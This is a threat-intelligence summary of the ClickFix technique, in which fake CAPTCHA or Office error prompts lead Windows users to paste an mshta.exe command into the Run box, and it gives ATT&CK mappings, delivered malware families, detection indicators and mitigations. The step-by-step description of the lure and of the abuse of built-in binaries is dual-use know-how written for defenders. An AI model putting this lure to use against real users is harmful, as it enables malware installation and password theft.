Full Report
A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed "ClickFix," the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.
Analysis Summary
# Tool/Technique: ClickFix
## Overview
ClickFix is a social engineering technique disguised as a CAPTCHA or verification test on compromised websites or via phishing emails. Its purpose is to trick users into executing a specific sequence of keyboard inputs that leverages built-in Windows functionality (`Win+R` and clipboard interaction) to download and execute password-stealing malware.
## Technical Details
- Type: Technique/Social Engineering Attack Pattern
- Platform: Microsoft Windows
- Capabilities: Exploits legitimate Windows functions (`mshta.exe`, Run command) via user interaction to achieve remote code execution and malware download.
- First Seen: Targeted attacks reported last year (2024).
## MITRE ATT&CK Mapping
Since ClickFix relies on user instruction to execute built-in features, the mapping focuses on the resulting execution methods:
- T1218 - System Binary Proxy Execution
- T1218.011 - Mshta
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (Implied by Run command execution)
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Especially when delivered via HTML attachments)
## Functionality
### Core Capabilities
- **Deception:** Mimics "Verify You are a Human" tests or CAPTCHAs.
- **User Interaction Reliance:** Requires the user to perform three specific sequential key presses after clicking a deceptive button.
- **Run Command Invocation:** Uses the `Win + R` combination to open the Windows Run prompt.
- **Clipboard Injection:** Uses `CTRL + V` to paste malicious code supplied by the website's virtual clipboard into the Run prompt.
- **Execution via mshta.exe:** Executes the pasted command line using `mshta.exe`, which is used to run Microsoft HTML Application files. This results in the download and launch of various payloads (PowerShell, JavaScript, or PE files).
### Advanced Features
- **Payload Flexibility:** Capable of delivering a wide array of commodity malware, including significant commodity malware families.
- **Multi-vector Delivery:** Delivered via compromised websites, and via phishing emails using HTML attachments that spoof Microsoft Office error messages directing users to click a "Solution" button.
## Indicators of Compromise
- File Hashes: Not applicable to the technique itself, but related payloads include:
- XWorm
- Lumma stealer
- VenomRAT
- AsyncRAT
- Danabot
- NetSupport RAT
- File Names: Payloads may utilize PowerShell, JavaScript, or portable executable (PE) content.
- Registry Keys: Not specified.
- Network Indicators: Payload communication depends on the specific malware delivered (e.g., C2 traffic associated with XWorm, Lumma stealer, etc.).
- Behavioral Indicators:
- Detection of sequential user input leading to Run prompt activation (`Win+R`).
- Execution of `mshta.exe` with complex command-line arguments or parameters indicative of remote content loading.
- Unexpected network connections originating from `mshta.exe`.
## Associated Threat Actors
Threat actors utilizing the ClickFix technique can be varied, leveraging it as a delivery mechanism for common malware kits. Specific mentions associated with the reported activity include:
- General cybercriminals targeting hospitality workers (impersonating Booking.com).
- Threat actors targeting the healthcare sector (leveraging compromised sites like HEP2go).
## Detection Methods
- **Signature-based detection:** Signatures for the specific commodity malware payloads (XWorm, Lumma, etc.) are crucial.
- **Behavioral detection:** Monitoring for the sequence of user actions leading to the execution chain (`Win+R` followed by `CTRL+V` execution via the resulting prompt). Monitoring for anomalies involving `mshta.exe` spawning connections or downloading unexpected file types.
- **YARA rules:** Can be developed for the HTML attachments or the downloaded scripts/PE files.
## Mitigation Strategies
- **Group Policy Restrictions:** Disable the functionality of the "Run" command when users hit the `Win + R` key combination.
- **User Education:** Train users, especially hospitality and healthcare workers, to recognize that standard CAPTCHAs do not require complex keypress sequences involving system commands, and to be wary of suspicious pop-ups on websites or in email attachments.
- **Application Control/Whitelisting:** Restrict the execution of potentially dangerous system binaries like `mshta.exe` from unexpected locations or command structures.
- **Email Security:** Enhance filtering for HTML attachments that display image content followed by apparent error messages urging user interaction.
## Related Tools/Techniques
- **Microsoft Office Macros:** The reliance on deceiving users into executing code via a layer of user interaction is reminiscent of older malicious macro campaigns.
- **Other legitimate Windows utilities:** Any technique that abuses built-in binaries (Living Off The Land Binaries - LOLBAS) to execute payloads, such as using `certutil.exe` or `regsvr32.exe`.